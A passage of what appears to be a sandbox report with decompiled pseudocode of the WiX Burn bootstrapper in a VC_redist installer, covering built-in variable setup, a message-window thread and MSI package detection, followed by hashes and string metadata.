                                                                          				_v704 = E000B6360;
                                                                          				_v700 = 0;
                                                                          				_v696 = 0;
                                                                          				_v692 = 0;
                                                                          				_v688 = L"ProcessorArchitecture";
                                                                          				_v684 = E000B65DF;
                                                                          				_v680 = 0xe;
                                                                          				_v676 = 0;
                                                                          				_t322 = 0x26;
                                                                          				_v660 = _t322;
                                                                          				_v640 = _t322;
                                                                          				_v620 = _t322;
                                                                          				_v604 = E000B5EAB;
                                                                          				_v564 = E000B5EAB;
                                                                          				_v524 = E000B5EAB;
                                                                          				_v504 = E000B5EAB;
                                                                          				_v520 = _t342;
                                                                          				_v624 = E000B5D71;
                                                                          				_v560 = _t336;
                                                                          				_v484 = E000B64B6;
                                                                          				_v464 = E000B64B6;
                                                                          				_t346 = 2;
                                                                          				_v672 = 0;
                                                                          				_v668 = L"ProgramFiles64Folder";
                                                                          				_v664 = E000B6418;
                                                                          				_v656 = 0;
                                                                          				_v652 = 0;
                                                                          				_v648 = L"ProgramFilesFolder";
                                                                          				_v644 = E000B5EAB;
                                                                          				_v636 = 0;
                                                                          				_v632 = 0;
                                                                          				_v628 = L"ProgramFiles6432Folder";
                                                                          				_v616 = 0;
                                                                          				_v612 = 0;
                                                                          				_v608 = L"ProgramMenuFolder";
                                                                          				_v600 = E000B5D71;
                                                                          				_v596 = 0;
                                                                          				_v592 = 0;
                                                                          				_v588 = L"RebootPending";
                                                                          				_v584 = E000B63A9;
                                                                          				_v580 = 0;
                                                                          				_v576 = 0;
                                                                          				_v572 = 0;
                                                                          				_v568 = L"SendToFolder";
                                                                          				_v556 = 0;
                                                                          				_v552 = 0;
                                                                          				_v548 = L"ServicePackLevel";
                                                                          				_v544 = E000B67E5;
                                                                          				_v540 = 3;
                                                                          				_v536 = 0;
                                                                          				_v532 = 0;
                                                                          				_v528 = L"StartMenuFolder";
                                                                          				_v516 = 0;
                                                                          				_v512 = 0;
                                                                          				_v508 = L"StartupFolder";
                                                                          				_v500 = _t333;
                                                                          				_v496 = 0;
                                                                          				_v492 = 0;
                                                                          				_v488 = L"SystemFolder";
                                                                          				_v480 = 0;
                                                                          				_v476 = 0;
                                                                          				_v472 = 0;
                                                                          				_v468 = L"System64Folder";
                                                                          				_v460 = 1;
                                                                          				_v456 = 0;
                                                                          				_v452 = 0;
                                                                          				_v448 = L"SystemLanguageID";
                                                                          				_v444 = E000B5D0D;
                                                                          				_v440 = 0;
                                                                          				_v436 = 0;
                                                                          				_v432 = 0;
                                                                          				_v428 = L"TempFolder";
                                                                          				_v424 = E000B6644;
                                                                          				_v420 = 0;
                                                                          				_v416 = 0;
                                                                          				_v412 = 0;
                                                                          				_v408 = L"TemplateFolder";
                                                                          				_v404 = E000B5EAB;
                                                                          				_v400 = 0x15;
                                                                          				_v396 = 0;
                                                                          				_v392 = 0;
                                                                          				_v284 = E000B5EAB;
                                                                          				_v324 = E000B67E5;
                                                                          				_v304 = E000B67E5;
                                                                          				_t338 = E000B648B;
                                                                          				_v244 = E000B6159;
                                                                          				_v164 = E000B6159;
                                                                          				_v144 = E000B6159;
                                                                          				_v388 = L"TerminalServer";
                                                                          				_v384 = E000B6184;
                                                                          				_v380 = 0xd;
                                                                          				_v376 = 0;
                                                                          				_v372 = 0;
                                                                          				_v368 = L"UserLanguageID";
                                                                          				_v364 = E000B5D3F;
                                                                          				_v360 = 0;
                                                                          				_v356 = 0;
                                                                          				_v352 = 0;
                                                                          				_v348 = L"VersionMsi";
                                                                          				_v344 = E000B671C;
                                                                          				_v340 = 0;
                                                                          				_v336 = 0;
                                                                          				_v332 = 0;
                                                                          				_v328 = L"VersionNT";
                                                                          				_v320 = 1;
                                                                          				_v316 = 0;
                                                                          				_v312 = 0;
                                                                          				_v308 = L"VersionNT64";
                                                                          				_v300 = _t346;
                                                                          				_v296 = 0;
                                                                          				_v292 = 0;
                                                                          				_v288 = L"WindowsFolder";
                                                                          				_v280 = 0x24;
                                                                          				_v276 = 0;
                                                                          				_v272 = 0;
                                                                          				_v268 = L"WindowsVolume";
                                                                          				_v264 = E000B69B8;
                                                                          				_v260 = 0;
                                                                          				_v256 = 0;
                                                                          				_v252 = 0;
                                                                          				_v248 = L"WixBundleAction";
                                                                          				_v240 = 0;
                                                                          				_v236 = 0;
                                                                          				_v232 = 1;
                                                                          				_v228 = L"WixBundleExecutePackageCacheFolder";
                                                                          				_v224 = E000B648B;
                                                                          				_v220 = 0;
                                                                          				_v216 = 0;
                                                                          				_v212 = 1;
                                                                          				_v208 = L"WixBundleExecutePackageAction";
                                                                          				_v204 = E000B648B;
                                                                          				_v200 = 0;
                                                                          				_v196 = 0;
                                                                          				_v192 = 1;
                                                                          				_v188 = L"WixBundleForcedRestartPackage";
                                                                          				_v184 = E000B648B;
                                                                          				_v180 = 0;
                                                                          				_v176 = 1;
                                                                          				_v172 = 1;
                                                                          				_v168 = L"WixBundleInstalled";
                                                                          				_v160 = 0;
                                                                          				_v156 = 0;
                                                                          				_v152 = 1;
                                                                          				_v148 = L"WixBundleElevated";
                                                                          				_v140 = 0;
                                                                          				_v136 = 0;
                                                                          				_v132 = 1;
                                                                          				_v128 = L"WixBundleActiveParent";
                                                                          				_v124 = E000B648B;
                                                                          				_v120 = 0;
                                                                          				_v116 = 0;
                                                                          				_v112 = 1;
                                                                          				_v108 = L"WixBundleProviderKey";
                                                                          				_v104 = E000B648B;
                                                                          				_v100 = 0xfb524;
                                                                          				_v96 = 0;
                                                                          				_v92 = 1;
                                                                          				_v88 = L"WixBundleSourceProcessPath";
                                                                          				_v84 = E000B648B;
                                                                          				_v80 = 0;
                                                                          				_v76 = 0;
                                                                          				_t347 =  &_v1216;
                                                                          				_v72 = 1;
                                                                          				_v68 = L"WixBundleSourceProcessFolder";
                                                                          				_v64 = E000B648B;
                                                                          				_v60 = 0;
                                                                          				_v56 = 0;
                                                                          				_v52 = 1;
                                                                          				_v48 = L"WixBundleTag";
                                                                          				_v44 = E000B648B;
                                                                          				_v40 = 0xfb524;
                                                                          				_v36 = 0;
                                                                          				_v32 = 1;
                                                                          				_v28 = L"WixBundleVersion";
                                                                          				_v24 = E000B66F1;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 1;
                                                                          				while(1) {
                                                                          					_t328 = E000B5530(_t338, _v1232,  *((intOrPtr*)(_t347 - 0xc)),  *((intOrPtr*)(_t347 - 8)),  *((intOrPtr*)(_t347 - 4)),  *_t347,  *((intOrPtr*)(_t347 + 4))); // executed
                                                                          					_t334 = _t328;
                                                                          					if(_t328 < 0) {
                                                                          						break;
                                                                          					}
                                                                          					_t348 = _t348 + 1;
                                                                          					_t347 = _t347 + 0x14;
                                                                          					if(_t348 < 0x3d) {
                                                                          						continue;
                                                                          					} else {
                                                                          					}
                                                                          					L5:
                                                                          					return E000DDE36(_t334, _v8 ^ _t349, 1, _t347, _t348);
                                                                          				}
                                                                          				E000F012F(_t334, "Failed to add built-in variable: %ls.",  *((intOrPtr*)(_t347 - 0xc)));
                                                                          				goto L5;
                                                                          			}
                                                                          0x000b7844
                                                                          0x000b784a
                                                                          0x000b7854
                                                                          0x000b785a
                                                                          0x000b7860
                                                                          0x000b7866
                                                                          0x000b7870
                                                                          0x000b787a
                                                                          0x000b7880
                                                                          0x000b7886
                                                                          0x000b7890
                                                                          0x000b7896
                                                                          0x000b789c
                                                                          0x000b78a2
                                                                          0x000b78ac
                                                                          0x000b78b6
                                                                          0x000b78bc
                                                                          0x000b78c2
                                                                          0x000b78cc
                                                                          0x000b78d2
                                                                          0x000b78d8
                                                                          0x000b78de
                                                                          0x000b78e8
                                                                          0x000b78f2
                                                                          0x000b78f8
                                                                          0x000b78fe
                                                                          0x000b7904
                                                                          0x000b790e
                                                                          0x000b7918
                                                                          0x000b791e
                                                                          0x000b7924
                                                                          0x000b792a
                                                                          0x000b7934
                                                                          0x000b793e
                                                                          0x000b7948
                                                                          0x000b7950
                                                                          0x000b7951
                                                                          0x000b7957
                                                                          0x000b795d
                                                                          0x000b7968
                                                                          0x000b796e
                                                                          0x000b7974
                                                                          0x000b797a
                                                                          0x000b7985
                                                                          0x000b798f
                                                                          0x000b7996
                                                                          0x000b79a1
                                                                          0x000b79a7
                                                                          0x000b79b2
                                                                          0x000b79b3
                                                                          0x000b79b9
                                                                          0x000b79c3
                                                                          0x000b79cd
                                                                          0x000b79d3
                                                                          0x000b79d9
                                                                          0x000b79e3
                                                                          0x000b79ed
                                                                          0x000b79f3
                                                                          0x000b79f9
                                                                          0x000b7a03
                                                                          0x000b7a09
                                                                          0x000b7a0f
                                                                          0x000b7a19
                                                                          0x000b7a1f
                                                                          0x000b7a25
                                                                          0x000b7a2b
                                                                          0x000b7a35
                                                                          0x000b7a3f
                                                                          0x000b7a45
                                                                          0x000b7a4b
                                                                          0x000b7a51
                                                                          0x000b7a5b
                                                                          0x000b7a61
                                                                          0x000b7a67
                                                                          0x000b7a71
                                                                          0x000b7a77
                                                                          0x000b7a81
                                                                          0x000b7a87
                                                                          0x000b7a8d
                                                                          0x000b7a97
                                                                          0x000b7a9d
                                                                          0x000b7aa3
                                                                          0x000b7aad
                                                                          0x000b7ab3
                                                                          0x000b7ab9
                                                                          0x000b7abf
                                                                          0x000b7ac9
                                                                          0x000b7acf
                                                                          0x000b7ad5
                                                                          0x000b7adb
                                                                          0x000b7ae5
                                                                          0x000b7aeb
                                                                          0x000b7af1
                                                                          0x000b7af7
                                                                          0x000b7b01
                                                                          0x000b7b0b
                                                                          0x000b7b11
                                                                          0x000b7b17
                                                                          0x000b7b1d
                                                                          0x000b7b27
                                                                          0x000b7b31
                                                                          0x000b7b37
                                                                          0x000b7b3d
                                                                          0x000b7b43
                                                                          0x000b7b4d
                                                                          0x000b7b53
                                                                          0x000b7b5d
                                                                          0x000b7b63
                                                                          0x000b7b69
                                                                          0x000b7b74
                                                                          0x000b7b7a
                                                                          0x000b7b80
                                                                          0x000b7b85
                                                                          0x000b7b8b
                                                                          0x000b7b91
                                                                          0x000b7b9c
                                                                          0x000b7ba6
                                                                          0x000b7bb0
                                                                          0x000b7bba
                                                                          0x000b7bc0
                                                                          0x000b7bc6
                                                                          0x000b7bd0
                                                                          0x000b7bda
                                                                          0x000b7be0
                                                                          0x000b7be6
                                                                          0x000b7bec
                                                                          0x000b7bf6
                                                                          0x000b7c00
                                                                          0x000b7c06
                                                                          0x000b7c0c
                                                                          0x000b7c12
                                                                          0x000b7c1c
                                                                          0x000b7c22
                                                                          0x000b7c28
                                                                          0x000b7c2e
                                                                          0x000b7c38
                                                                          0x000b7c3e
                                                                          0x000b7c44
                                                                          0x000b7c4a
                                                                          0x000b7c54
                                                                          0x000b7c5e
                                                                          0x000b7c64
                                                                          0x000b7c6a
                                                                          0x000b7c74
                                                                          0x000b7c7e
                                                                          0x000b7c84
                                                                          0x000b7c8a
                                                                          0x000b7c90
                                                                          0x000b7c9a
                                                                          0x000b7ca0
                                                                          0x000b7ca6
                                                                          0x000b7cac
                                                                          0x000b7cb6
                                                                          0x000b7cbc
                                                                          0x000b7cc2
                                                                          0x000b7cc8
                                                                          0x000b7cce
                                                                          0x000b7cd8
                                                                          0x000b7cde
                                                                          0x000b7ce4
                                                                          0x000b7cea
                                                                          0x000b7cf0
                                                                          0x000b7cfa
                                                                          0x000b7d00
                                                                          0x000b7d06
                                                                          0x000b7d0c
                                                                          0x000b7d12
                                                                          0x000b7d1c
                                                                          0x000b7d22
                                                                          0x000b7d28
                                                                          0x000b7d2e
                                                                          0x000b7d38
                                                                          0x000b7d3e
                                                                          0x000b7d44
                                                                          0x000b7d47
                                                                          0x000b7d4e
                                                                          0x000b7d51
                                                                          0x000b7d54
                                                                          0x000b7d57
                                                                          0x000b7d5a
                                                                          0x000b7d61
                                                                          0x000b7d64
                                                                          0x000b7d67
                                                                          0x000b7d6a
                                                                          0x000b7d6d
                                                                          0x000b7d74
                                                                          0x000b7d77
                                                                          0x000b7d7a
                                                                          0x000b7d7d
                                                                          0x000b7d83
                                                                          0x000b7d86
                                                                          0x000b7d8d
                                                                          0x000b7d90
                                                                          0x000b7d93
                                                                          0x000b7d96
                                                                          0x000b7d99
                                                                          0x000b7da0
                                                                          0x000b7da3
                                                                          0x000b7da6
                                                                          0x000b7da9
                                                                          0x000b7dac
                                                                          0x000b7db3
                                                                          0x000b7dba
                                                                          0x000b7dbd
                                                                          0x000b7dc0
                                                                          0x000b7dc3
                                                                          0x000b7dd7
                                                                          0x000b7ddc
                                                                          0x000b7de0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b7de2
                                                                          0x000b7de3
                                                                          0x000b7de9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b7deb
                                                                          0x000b7dfe
                                                                          0x000b7e10
                                                                          0x000b7e10
                                                                          0x000b7df6
                                                                          0x00000000

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(000C7378,000B52B5,00000000,000B533D), ref: 000B7523
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalInitializeSection
                                                                          • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleVersion
                                                                          • API String ID: 32694325-826827252
                                                                          • Opcode ID: e23bf28a2b2ac740473f17f906fe5acbc389170f678f5fa76e6164ae21e7d7da
                                                                          • Instruction ID: 126fdcdfdaa1c4ac982c601b7832a640850c231f26e1b516d9694ae5a2cba4be
                                                                          • Opcode Fuzzy Hash: e23bf28a2b2ac740473f17f906fe5acbc389170f678f5fa76e6164ae21e7d7da
                                                                          • Instruction Fuzzy Hash: DE324AB0C2537D8BDB65CF49C9897DDBAB8BB49B04F5081DAE20CA6600D7B50B84DF84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 78%
                                                                          			E000CE563(signed int _a4) {
                                                                          				int _v8;
                                                                          				void _v12;
                                                                          				struct tagMSG _v40;
                                                                          				struct _WNDCLASSW _v80;
                                                                          				int _t35;
                                                                          				intOrPtr _t37;
                                                                          				short _t40;
                                                                          				struct HWND__* _t44;
                                                                          				int _t47;
                                                                          				int _t52;
                                                                          				signed short _t57;
                                                                          				signed short _t60;
                                                                          				void** _t64;
                                                                          				signed int _t65;
                                                                          				void* _t77;
                                                                          				struct HWND__* _t79;
                                                                          
                                                                          				_t64 = _a4;
                                                                          				_t65 = 0xa;
                                                                          				_t79 = 0;
                                                                          				_t35 = memset( &_v80, 0, _t65 << 2);
                                                                          				_push(7);
                                                                          				_v12 = 0;
                                                                          				memset( &_v40, _t35, 0 << 2);
                                                                          				_t77 = _t64[2];
                                                                          				_v8 = 0;
                                                                          				_t37 =  *((intOrPtr*)(_t77 + 0x490));
                                                                          				_a4 = 0 | _t37 == 0x00000002;
                                                                          				if(_t37 != 2 || TlsSetValue( *(_t77 + 0x498),  *(_t77 + 0x4b0)) != 0) {
                                                                          					_v80.hInstance = _t64[1];
                                                                          					_v80.lpfnWndProc = E000CE705;
                                                                          					_v80.lpszClassName = L"WixBurnMessageWindow";
                                                                          					_t40 = RegisterClassW( &_v80); // executed
                                                                          					if(_t40 != 0) {
                                                                          						_v12 = _a4;
                                                                          						_v8 = _t77 + 0xb8;
                                                                          						_t44 = CreateWindowExW(0x80, _v80.lpszClassName, _t79, 0x90000000, 0x80000000, 8, _t79, _t79, _t79, _t79, _t64[1],  &_v12); // executed
                                                                          						if(_t44 != 0) {
                                                                          							 *(_t77 + 0x3e0) = _t44;
                                                                          							SetEvent( *_t64);
                                                                          							while(1) {
                                                                          								_t47 = GetMessageW( &_v40, _t79, _t79, _t79);
                                                                          								if(_t47 == 0) {
                                                                          									break;
                                                                          								}
                                                                          								if(_t47 == 0xffffffff) {
                                                                          									_t79 = 0x8000ffff;
                                                                          									_push("Unexpected return value from message pump.");
                                                                          									L14:
                                                                          									_push(_t79);
                                                                          									E000F012F();
                                                                          									goto L15;
                                                                          								}
                                                                          								_t52 = IsDialogMessageW(_v40,  &_v40); // executed
                                                                          								if(_t52 == 0) {
                                                                          									TranslateMessage( &_v40);
                                                                          									DispatchMessageW( &_v40);
                                                                          								}
                                                                          							}
                                                                          							goto L15;
                                                                          						}
                                                                          						_t57 = GetLastError();
                                                                          						_t82 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          						_t79 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "uithread.cpp", 0x8a, _t79);
                                                                          						_push("Failed to create window.");
                                                                          						goto L14;
                                                                          					}
                                                                          					_t60 = GetLastError();
                                                                          					_t85 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                          					_t79 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "uithread.cpp", 0x80, _t79);
                                                                          					_push("Failed to register window.");
                                                                          					goto L14;
                                                                          				} else {
                                                                          					_t79 = 0x8007139f;
                                                                          					L15:
                                                                          					UnregisterClassW(L"WixBurnMessageWindow", _t64[1]);
                                                                          					return _t79;
                                                                          				}
                                                                          			}




















                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                          • String ID: @Met$Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                          • API String ID: 213125376-1135386840
                                                                          • Opcode ID: 427cd1986bcad81a3dadbb9ed4ee8e99830f30681a65443814fb7915b3a55cb9
                                                                          • Instruction ID: 880d4cbc554da336e78994f3faa5d1bd848c89c46b2746c63587e649224fcce5
                                                                          • Opcode Fuzzy Hash: 427cd1986bcad81a3dadbb9ed4ee8e99830f30681a65443814fb7915b3a55cb9
                                                                          • Instruction Fuzzy Hash: 4F41A476A40254ABEB209BA4DD44FEEBFE8FF08350F11412AF909E7590D7749900DBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 62%
                                                                          			E000D3870(int __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				short _v88;
                                                                          				char _v92;
                                                                          				char _v96;
                                                                          				int _v100;
                                                                          				intOrPtr* _v104;
                                                                          				intOrPtr _v108;
                                                                          				intOrPtr _v112;
                                                                          				char _v116;
                                                                          				char _v120;
                                                                          				int _v124;
                                                                          				int _v128;
                                                                          				int _v132;
                                                                          				signed int _v136;
                                                                          				signed int _v140;
                                                                          				char _v144;
                                                                          				int _v148;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t184;
                                                                          				void* _t190;
                                                                          				void* _t192;
                                                                          				int _t195;
                                                                          				int _t203;
                                                                          				signed int _t204;
                                                                          				int _t205;
                                                                          				intOrPtr* _t206;
                                                                          				int _t212;
                                                                          				int _t213;
                                                                          				intOrPtr* _t219;
                                                                          				int _t220;
                                                                          				int _t222;
                                                                          				int _t224;
                                                                          				int _t227;
                                                                          				void* _t229;
                                                                          				int _t231;
                                                                          				intOrPtr _t238;
                                                                          				intOrPtr* _t246;
                                                                          				int _t257;
                                                                          				intOrPtr* _t258;
                                                                          				int _t261;
                                                                          				void* _t263;
                                                                          				int _t265;
                                                                          				intOrPtr* _t270;
                                                                          				int _t280;
                                                                          				intOrPtr* _t281;
                                                                          				int _t282;
                                                                          				intOrPtr* _t288;
                                                                          				int _t290;
                                                                          				void* _t291;
                                                                          				int _t294;
                                                                          				int _t298;
                                                                          				intOrPtr _t300;
                                                                          				int _t303;
                                                                          				void* _t305;
                                                                          				intOrPtr _t307;
                                                                          				int _t308;
                                                                          				intOrPtr* _t317;
                                                                          				void* _t318;
                                                                          				intOrPtr* _t321;
                                                                          				int _t322;
                                                                          				int _t323;
                                                                          				intOrPtr* _t326;
                                                                          				signed int _t327;
                                                                          				void* _t328;
                                                                          				void* _t329;
                                                                          
                                                                          				_t311 = __edx;
                                                                          				_t184 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t184 ^ _t327;
                                                                          				_v140 = _v140 | 0xffffffff;
                                                                          				_t317 = _a4;
                                                                          				_t290 = 0;
                                                                          				_v108 = _a8;
                                                                          				_v92 = 0;
                                                                          				_v120 = 0;
                                                                          				_v96 = 0;
                                                                          				_v144 = 0;
                                                                          				_v100 = 0;
                                                                          				E000DF670(_t317,  &_v88, 0, 0x4e);
                                                                          				_t329 = _t328 + 0xc;
                                                                          				_v132 = 0;
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				asm("movlpd [ebp-0x70], xmm0");
                                                                          				_push( &_v92);
                                                                          				_push(L"VersionString");
                                                                          				_t190 = 2;
                                                                          				_t291 = 4;
                                                                          				_t191 =  !=  ? _t291 : _t190;
                                                                          				_push( !=  ? _t291 : _t190);
                                                                          				_push(0);
                                                                          				_push( *(_t317 + 0x90));
                                                                          				_t192 = E000F28F8(_t291); // executed
                                                                          				_t318 = _t192;
                                                                          				if(_t318 < 0) {
                                                                          					__eflags = _t318 - 0x80070645;
                                                                          					if(_t318 == 0x80070645) {
                                                                          						L21:
                                                                          						_t195 = E000D7B88(_t317,  &_v144,  &_v96); // executed
                                                                          						__eflags = _t195;
                                                                          						if(_t195 < 0) {
                                                                          							L33:
                                                                          							 *(_t317 + 0x40) = 2;
                                                                          							_t319 = _t290;
                                                                          							goto L34;
                                                                          						} else {
                                                                          							__eflags =  *((intOrPtr*)(_t317 + 0x14)) - _t290;
                                                                          							_push( &_v92);
                                                                          							_push(L"VersionString");
                                                                          							_t263 = 2;
                                                                          							_t305 = 4;
                                                                          							_t264 =  !=  ? _t305 : _t263;
                                                                          							_push( !=  ? _t305 : _t263);
                                                                          							_push(_t290);
                                                                          							_push(_v96);
                                                                          							_t265 = E000F28F8(_t305);
                                                                          							__eflags = _t265;
                                                                          							if(_t265 < 0) {
                                                                          								goto L33;
                                                                          							} else {
                                                                          								_t319 = E000F4B5A(_t311, _v92, _t290,  &_v116);
                                                                          								__eflags = _t319;
                                                                          								if(_t319 >= 0) {
                                                                          									__eflags =  *((intOrPtr*)(_t317 + 0x9c)) - _v112;
                                                                          									if(__eflags > 0) {
                                                                          										goto L33;
                                                                          									} else {
                                                                          										if(__eflags < 0) {
                                                                          											L28:
                                                                          											E000B550F(2, 0x2000006c,  *_t317);
                                                                          											_t329 = _t329 + 0x1c;
                                                                          											_t270 =  *((intOrPtr*)(_v108 + 0x10));
                                                                          											_t319 = E000BD58B(_v108, 1,  *((intOrPtr*)( *_t270 + 0x34))(_t270,  *_t317, _v96, _v144, _v96, _v92,  *(_t317 + 0x90)));
                                                                          											__eflags = _t319;
                                                                          											if(_t319 >= 0) {
                                                                          												_t67 = _t317 + 0xa0; // 0x158
                                                                          												_t319 = E000B21A5(_t67, _v96, _t290);
                                                                          												__eflags = _t319;
                                                                          												if(_t319 >= 0) {
                                                                          													 *((intOrPtr*)(_t317 + 0xa8)) = _v116;
                                                                          													 *((intOrPtr*)(_t317 + 0xac)) = _v112;
                                                                          													 *(_t317 + 0xd8) = 1;
                                                                          													goto L33;
                                                                          												} else {
                                                                          													_push("Failed to copy the installed ProductCode to the package.");
                                                                          													goto L119;
                                                                          												}
                                                                          											} else {
                                                                          												E000B37D3(_t272, "msiengine.cpp", 0x1c4, _t319);
                                                                          												_push("UX aborted detect compatible MSI package.");
                                                                          												goto L119;
                                                                          											}
                                                                          										} else {
                                                                          											__eflags =  *(_t317 + 0x98) - _v116;
                                                                          											if( *(_t317 + 0x98) >= _v116) {
                                                                          												goto L33;
                                                                          											} else {
                                                                          												goto L28;
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_push(_v96);
                                                                          									goto L3;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						__eflags = _t318 - 0x80070648;
                                                                          						if(_t318 == 0x80070648) {
                                                                          							goto L21;
                                                                          						} else {
                                                                          							_push( *(_t317 + 0x90));
                                                                          							_push("Failed to get product information for ProductCode: %ls");
                                                                          							goto L20;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t17 = _t317 + 0xa8; // 0x160
                                                                          					_t280 = E000F4B5A(_t311, _v92, 0, _t17);
                                                                          					_t319 = _t280;
                                                                          					if(_t280 >= 0) {
                                                                          						_t22 = _t317 + 0xa8; // 0x160
                                                                          						_t281 = _t22;
                                                                          						__eflags =  *((intOrPtr*)(_t317 + 0x9c)) -  *((intOrPtr*)(_t281 + 4));
                                                                          						_t307 =  *_t281;
                                                                          						_t311 =  *(_t317 + 0x98);
                                                                          						if(__eflags > 0) {
                                                                          							L8:
                                                                          							__eflags =  *((intOrPtr*)(_t317 + 0x9c)) -  *((intOrPtr*)(_t281 + 4));
                                                                          							_t311 =  *(_t317 + 0x98);
                                                                          							if(__eflags < 0) {
                                                                          								L12:
                                                                          								_t308 = _t290;
                                                                          							} else {
                                                                          								if(__eflags > 0) {
                                                                          									L11:
                                                                          									_t308 = 2;
                                                                          									_v100 = _t308;
                                                                          								} else {
                                                                          									__eflags = _t311 - _t307;
                                                                          									if(_t311 <= _t307) {
                                                                          										goto L12;
                                                                          									} else {
                                                                          										goto L11;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          							_t282 = 4;
                                                                          							 *(_t317 + 0x40) = _t282;
                                                                          							__eflags = _t308;
                                                                          							if(_t308 == 0) {
                                                                          								goto L34;
                                                                          							} else {
                                                                          								goto L14;
                                                                          							}
                                                                          						} else {
                                                                          							if(__eflags < 0) {
                                                                          								L7:
                                                                          								 *(_t317 + 0x40) = 5;
                                                                          								_t308 = 1;
                                                                          								_v100 = 1;
                                                                          								L14:
                                                                          								_t33 = _t317 + 0xa8; // 0x160
                                                                          								_t326 = _t33;
                                                                          								E000B550F(2, 0x20000067,  *(_t317 + 0x90));
                                                                          								_t329 = _t329 + 0x1c;
                                                                          								_t288 =  *((intOrPtr*)(_v108 + 0x10));
                                                                          								_t319 = E000BD58B(_v108, 1,  *((intOrPtr*)( *_t288 + 0x38))(_t288,  *_t317,  *(_t317 + 0x90),  *((intOrPtr*)(_t317 + 0x14)),  *_t326,  *((intOrPtr*)(_t326 + 4)), _v100, E000C40EF( *((intOrPtr*)(_t317 + 0x14))), E000C43FA( *_t326,  *((intOrPtr*)(_t326 + 4))),  *((intOrPtr*)(_t317 + 0x94)), E000C4107(_t308)));
                                                                          								__eflags = _t319;
                                                                          								if(_t319 >= 0) {
                                                                          									L34:
                                                                          									_v124 = _t290;
                                                                          									__eflags =  *((intOrPtr*)(_t317 + 0xc8)) - _t290;
                                                                          									if( *((intOrPtr*)(_t317 + 0xc8)) <= _t290) {
                                                                          										L92:
                                                                          										__eflags =  *(_t317 + 0xc0);
                                                                          										if( *(_t317 + 0xc0) != 0) {
                                                                          											_t203 = _t290;
                                                                          											_v124 = _t290;
                                                                          											do {
                                                                          												_t311 =  *((intOrPtr*)(_t317 + 0xbc)) + _t203;
                                                                          												_t294 = 4;
                                                                          												_v128 = _t311;
                                                                          												__eflags =  *(_t317 + 0x40) - _t294;
                                                                          												if( *(_t317 + 0x40) < _t294) {
                                                                          													_t204 = 2;
                                                                          													_v140 = _t204;
                                                                          													goto L99;
                                                                          												} else {
                                                                          													_t319 = E000F2CEE( *(_t317 + 0x90),  *_t311,  &_v140);
                                                                          													__eflags = _t319;
                                                                          													if(_t319 < 0) {
                                                                          														_push("Failed to query feature state.");
                                                                          														goto L119;
                                                                          													} else {
                                                                          														_t204 = _v140;
                                                                          														_t311 = _v128;
                                                                          														__eflags = _t204 - 0xffffffff;
                                                                          														if(_t204 == 0xffffffff) {
                                                                          															_t204 = 2;
                                                                          															_v140 = _t204;
                                                                          														}
                                                                          														_t294 = 4;
                                                                          														L99:
                                                                          														_t205 = _t204 - 1;
                                                                          														__eflags = _t205;
                                                                          														if(_t205 == 0) {
                                                                          															 *(_t311 + 0x1c) = 2;
                                                                          															goto L113;
                                                                          														} else {
                                                                          															_t212 = _t205 - 1;
                                                                          															__eflags = _t212;
                                                                          															if(_t212 == 0) {
